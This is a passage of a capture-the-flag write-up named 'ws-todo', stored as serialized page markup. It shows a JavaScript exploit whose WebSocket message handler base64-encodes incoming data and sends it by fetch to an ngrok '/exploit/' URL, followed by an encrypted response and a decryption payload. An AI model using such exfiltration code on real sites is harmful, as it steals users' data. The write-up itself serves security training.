:839},[52266,52270],{"type":33,"tag":128,"props":52267,"children":52268},{"style":312},[52269],{"type":38,"value":6850},{"type":33,"tag":128,"props":52271,"children":52272},{"style":323},[52273],{"type":38,"value":5676},{"type":33,"tag":128,"props":52275,"children":52276},{"class":130,"line":848},[52277,52281,52285,52290,52294,52298,52302,52306,52310,52314],{"type":33,"tag":128,"props":52278,"children":52279},{"style":306},[52280],{"type":38,"value":52037},{"type":33,"tag":128,"props":52282,"children":52283},{"style":312},[52284],{"type":38,"value":215},{"type":33,"tag":128,"props":52286,"children":52287},{"style":135},[52288],{"type":38,"value":52289},"onmessage",{"type":33,"tag":128,"props":52291,"children":52292},{"style":312},[52293],{"type":38,"value":5657},{"type":33,"tag":128,"props":52295,"children":52296},{"style":300},[52297],{"type":38,"value":5598},{"type":33,"tag":128,"props":52299,"children":52300},{"style":312},[52301],{"type":38,"value":2852},{"type":33,"tag":128,"props":52303,"children":52304},{"style":306},[52305],{"type":38,"value":49235},{"type":33,"tag":128,"props":52307,"children":52308},{"style":312},[52309],{"type":38,"value":2966},{"type":33,"tag":128,"props":52311,"children":52312},{"style":312},[52313],{"type":38,"value":5625},{"type":33,"tag":128,"props":52315,"children":52316},{"style":312},[52317],{"type":38,"value":762},{"type":33,"tag":128,"props":52319,"children":52320},{"class":130,"line":976},[52321,52326,52330,52334,52339,52343,52348,52352,52356,52360,52364,52368,52372,52376,52380,52384,52389,52393,52397,52402,52406],{"type":33,"tag":128,"props":52322,"children":52323},{"style":135},[52324],{"type":38,"value":52325},"    
fetch",{"type":33,"tag":128,"props":52327,"children":52328},{"style":312},[52329],{"type":38,"value":5566},{"type":33,"tag":128,"props":52331,"children":52332},{"style":676},[52333],{"type":38,"value":5739},{"type":33,"tag":128,"props":52335,"children":52336},{"style":140},[52337],{"type":38,"value":52338},"http://0c5f-91-69-133-214.ngrok.io/exploit/",{"type":33,"tag":128,"props":52340,"children":52341},{"style":1576},[52342],{"type":38,"value":5720},{"type":33,"tag":128,"props":52344,"children":52345},{"style":135},[52346],{"type":38,"value":52347},"btoa",{"type":33,"tag":128,"props":52349,"children":52350},{"style":312},[52351],{"type":38,"value":5566},{"type":33,"tag":128,"props":52353,"children":52354},{"style":140},[52355],{"type":38,"value":49235},{"type":33,"tag":128,"props":52357,"children":52358},{"style":312},[52359],{"type":38,"value":215},{"type":33,"tag":128,"props":52361,"children":52362},{"style":140},[52363],{"type":38,"value":2815},{"type":33,"tag":128,"props":52365,"children":52366},{"style":312},[52367],{"type":38,"value":2966},{"type":33,"tag":128,"props":52369,"children":52370},{"style":1576},[52371],{"type":38,"value":5730},{"type":33,"tag":128,"props":52373,"children":52374},{"style":676},[52375],{"type":38,"value":5739},{"type":33,"tag":128,"props":52377,"children":52378},{"style":312},[52379],{"type":38,"value":5584},{"type":33,"tag":128,"props":52381,"children":52382},{"style":312},[52383],{"type":38,"value":5642},{"type":33,"tag":128,"props":52385,"children":52386},{"style":437},[52387],{"type":38,"value":52388},"mode",{"type":33,"tag":128,"props":52390,"children":52391},{"style":312},[52392],{"type":38,"value":284},{"type":33,"tag":128,"props":52394,"children":52395},{"style":676},[52396],{"type":38,"value":6739},{"type":33,"tag":128,"props":52398,"children":52399},{"style":140},[52400],{"type":38,"value":52401},"no-cors",{"type":33,"tag":128,"props":52403,"children":52404},{"style":676},[52405],{"type":38,"value":6040},{"type":33,"tag":1
28,"props":52407,"children":52408},{"style":312},[52409],{"type":38,"value":5902},{"type":33,"tag":128,"props":52411,"children":52412},{"class":130,"line":988},[52413,52417],{"type":33,"tag":128,"props":52414,"children":52415},{"style":312},[52416],{"type":38,"value":6850},{"type":33,"tag":128,"props":52418,"children":52419},{"style":323},[52420],{"type":38,"value":5676},{"type":33,"tag":128,"props":52422,"children":52423},{"class":130,"line":1001},[52424,52428],{"type":33,"tag":128,"props":52425,"children":52426},{"style":312},[52427],{"type":38,"value":5730},{"type":33,"tag":128,"props":52429,"children":52430},{"style":323},[52431],{"type":38,"value":5676},{"type":33,"tag":128,"props":52433,"children":52434},{"class":130,"line":1014},[52435],{"type":33,"tag":128,"props":52436,"children":52437},{"style":323},[52438],{"type":38,"value":52439},"s();\n",{"type":33,"tag":128,"props":52441,"children":52442},{"class":130,"line":1026},[52443,52447,52451],{"type":33,"tag":128,"props":52444,"children":52445},{"style":312},[52446],{"type":38,"value":6190},{"type":33,"tag":128,"props":52448,"children":52449},{"style":1576},[52450],{"type":38,"value":15064},{"type":33,"tag":128,"props":52452,"children":52453},{"style":312},[52454],{"type":38,"value":6097},{"type":33,"tag":47,"props":52456,"children":52457},{},[52458],{"type":38,"value":52459},"With this we have this response:",{"type":33,"tag":114,"props":52461,"children":52462},{"lang":633},[52463],{"type":33,"tag":119,"props":52464,"children":52466},{"code":52465,"language":633,"meta":8,"className":637,"style":8},"{\n  \"quote\":\n    {\n      \"iv\": \"f35ddb2c2292f575d2b9fc505da10997\",\n      \"content\":\"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee\"\n    
}\n}\n",[52467],{"type":33,"tag":105,"props":52468,"children":52469},{"__ignoreMap":8},[52470,52477,52496,52503,52540,52572,52579],{"type":33,"tag":128,"props":52471,"children":52472},{"class":130,"line":131},[52473],{"type":33,"tag":128,"props":52474,"children":52475},{"style":312},[52476],{"type":38,"value":650},{"type":33,"tag":128,"props":52478,"children":52479},{"class":130,"line":362},[52480,52484,52488,52492],{"type":33,"tag":128,"props":52481,"children":52482},{"style":656},[52483],{"type":38,"value":659},{"type":33,"tag":128,"props":52485,"children":52486},{"style":437},[52487],{"type":38,"value":50333},{"type":33,"tag":128,"props":52489,"children":52490},{"style":656},[52491],{"type":38,"value":669},{"type":33,"tag":128,"props":52493,"children":52494},{"style":312},[52495],{"type":38,"value":5318},{"type":33,"tag":128,"props":52497,"children":52498},{"class":130,"line":403},[52499],{"type":33,"tag":128,"props":52500,"children":52501},{"style":312},[52502],{"type":38,"value":12699},{"type":33,"tag":128,"props":52504,"children":52505},{"class":130,"line":739},[52506,52510,52515,52519,52523,52527,52532,52536],{"type":33,"tag":128,"props":52507,"children":52508},{"style":656},[52509],{"type":38,"value":12707},{"type":33,"tag":128,"props":52511,"children":52512},{"style":437},[52513],{"type":38,"value":52514},"iv",{"type":33,"tag":128,"props":52516,"children":52517},{"style":656},[52518],{"type":38,"value":669},{"type":33,"tag":128,"props":52520,"children":52521},{"style":312},[52522],{"type":38,"value":284},{"type":33,"tag":128,"props":52524,"children":52525},{"style":676},[52526],{"type":38,"value":679},{"type":33,"tag":128,"props":52528,"children":52529},{"style":140},[52530],{"type":38,"value":52531},"f35ddb2c2292f575d2b9fc505da10997",{"type":33,"tag":128,"props":52533,"children":52534},{"style":676},[52535],{"type":38,"value":669},{"type":33,"tag":128,"props":52537,"children":52538},{"style":312},[52539],{"type":38,"value":693},{"type":33,"tag":128,"props"
:52541,"children":52542},{"class":130,"line":765},[52543,52547,52551,52555,52559,52563,52568],{"type":33,"tag":128,"props":52544,"children":52545},{"style":656},[52546],{"type":38,"value":12707},{"type":33,"tag":128,"props":52548,"children":52549},{"style":437},[52550],{"type":38,"value":5242},{"type":33,"tag":128,"props":52552,"children":52553},{"style":656},[52554],{"type":38,"value":669},{"type":33,"tag":128,"props":52556,"children":52557},{"style":312},[52558],{"type":38,"value":284},{"type":33,"tag":128,"props":52560,"children":52561},{"style":676},[52562],{"type":38,"value":669},{"type":33,"tag":128,"props":52564,"children":52565},{"style":140},[52566],{"type":38,"value":52567},"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee",{"type":33,"tag":128,"props":52569,"children":52570},{"style":676},[52571],{"type":38,"value":836},{"type":33,"tag":128,"props":52573,"children":52574},{"class":130,"line":804},[52575],{"type":33,"tag":128,"props":52576,"children":52577},{"style":312},[52578],{"type":38,"value":6760},{"type":33,"tag":128,"props":52580,"children":52581},{"class":130,"line":839},[52582],{"type":33,"tag":128,"props":52583,"children":52584},{"style":312},[52585],{"type":38,"value":854},{"type":33,"tag":47,"props":52587,"children":52588},{},[52589,52591,52596],{"type":38,"value":52590},"We can decrypt because the ",{"type":33,"tag":105,"props":52592,"children":52594},{"className":52593},[],[52595],{"type":38,"value":46812},{"type":38,"value":52597}," comes from us.",{"type":33,"tag":47,"props":52599,"children":52600},{},[52601,52603,52608],{"type":38,"value":52602},"So we can call ",{"type":33,"tag":105,"props":52604,"children":52606},{"className":52605},[],[52607],{"type":38,"value":46736},{"type":38,"value":52609}," with this 
payload:",{"type":33,"tag":114,"props":52611,"children":52612},{"lang":633},[52613],{"type":33,"tag":119,"props":52614,"children":52616},{"code":52615,"language":633,"meta":8,"className":637,"style":8},"{\n    \"cipher\": {\n        \"iv\": \"f35ddb2c2292f575d2b9fc505da10997\",\n        \"content\": \"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee\"\n    },\n    \"secret\": \"f3eeaa82370f7e9bfbc2caf16f6d19b7\"\n}\n",[52617],{"type":33,"tag":105,"props":52618,"children":52619},{"__ignoreMap":8},[52620,52627,52650,52685,52716,52724,52755],{"type":33,"tag":128,"props":52621,"children":52622},{"class":130,"line":131},[52623],{"type":33,"tag":128,"props":52624,"children":52625},{"style":312},[52626],{"type":38,"value":650},{"type":33,"tag":128,"props":52628,"children":52629},{"class":130,"line":362},[52630,52634,52638,52642,52646],{"type":33,"tag":128,"props":52631,"children":52632},{"style":656},[52633],{"type":38,"value":771},{"type":33,"tag":128,"props":52635,"children":52636},{"style":437},[52637],{"type":38,"value":46934},{"type":33,"tag":128,"props":52639,"children":52640},{"style":656},[52641],{"type":38,"value":669},{"type":33,"tag":128,"props":52643,"children":52644},{"style":312},[52645],{"type":38,"value":284},{"type":33,"tag":128,"props":52647,"children":52648},{"style":312},[52649],{"type":38,"value":762},{"type":33,"tag":128,"props":52651,"children":52652},{"class":130,"line":403},[52653,52657,52661,52665,52669,52673,52677,52681],{"type":33,"tag":128,"props":52654,"children":52655},{"style":656},[52656],{"type":38,"value":12732},{"type":33,"tag":128,"props":52658,"children":52659},{"style":437},[52660],{"type":38,"value":52514},{"type":33,"tag":128,"props":52662,"children":52663},{"style":656},[52664],{"type":38,"value":669},{"type":33,"tag":128,"props":52666,"children":52667},{"style":312},[52668],{"type":38,"value":284},{"type":33,"tag":128,"props":52670,"children":52671},{"st
yle":676},[52672],{"type":38,"value":679},{"type":33,"tag":128,"props":52674,"children":52675},{"style":140},[52676],{"type":38,"value":52531},{"type":33,"tag":128,"props":52678,"children":52679},{"style":676},[52680],{"type":38,"value":669},{"type":33,"tag":128,"props":52682,"children":52683},{"style":312},[52684],{"type":38,"value":693},{"type":33,"tag":128,"props":52686,"children":52687},{"class":130,"line":739},[52688,52692,52696,52700,52704,52708,52712],{"type":33,"tag":128,"props":52689,"children":52690},{"style":656},[52691],{"type":38,"value":12732},{"type":33,"tag":128,"props":52693,"children":52694},{"style":437},[52695],{"type":38,"value":5242},{"type":33,"tag":128,"props":52697,"children":52698},{"style":656},[52699],{"type":38,"value":669},{"type":33,"tag":128,"props":52701,"children":52702},{"style":312},[52703],{"type":38,"value":284},{"type":33,"tag":128,"props":52705,"children":52706},{"style":676},[52707],{"type":38,"value":679},{"type":33,"tag":128,"props":52709,"children":52710},{"style":140},[52711],{"type":38,"value":52567},{"type":33,"tag":128,"props":52713,"children":52714},{"style":676},[52715],{"type":38,"value":836},{"type":33,"tag":128,"props":52717,"children":52718},{"class":130,"line":765},[52719],{"type":33,"tag":128,"props":52720,"children":52721},{"style":312},[52722],{"type":38,"value":52723},"    
},\n",{"type":33,"tag":128,"props":52725,"children":52726},{"class":130,"line":804},[52727,52731,52735,52739,52743,52747,52751],{"type":33,"tag":128,"props":52728,"children":52729},{"style":656},[52730],{"type":38,"value":771},{"type":33,"tag":128,"props":52732,"children":52733},{"style":437},[52734],{"type":38,"value":46812},{"type":33,"tag":128,"props":52736,"children":52737},{"style":656},[52738],{"type":38,"value":669},{"type":33,"tag":128,"props":52740,"children":52741},{"style":312},[52742],{"type":38,"value":284},{"type":33,"tag":128,"props":52744,"children":52745},{"style":676},[52746],{"type":38,"value":679},{"type":33,"tag":128,"props":52748,"children":52749},{"style":140},[52750],{"type":38,"value":51908},{"type":33,"tag":128,"props":52752,"children":52753},{"style":676},[52754],{"type":38,"value":836},{"type":33,"tag":128,"props":52756,"children":52757},{"class":130,"line":839},[52758],{"type":33,"tag":128,"props":52759,"children":52760},{"style":312},[52761],{"type":38,"value":854},{"type":33,"tag":47,"props":52763,"children":52764},{},[52765],{"type":38,"value":52766},"And voila !",{"type":33,"tag":5227,"props":52768,"children":52769},{},[52770],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":52772},[52773,52774,52775,52777,52778],{"id":42,"depth":362,"text":45},{"id":48736,"depth":362,"text":48739},{"id":51342,"depth":362,"text":52776},"data column",{"id":51416,"depth":362,"text":51419},{"id":21053,"depth":362,"text":21056},"content:writeups:ws-todo.md","writeups/ws-todo.md","writeups/ws-todo",1749027219645]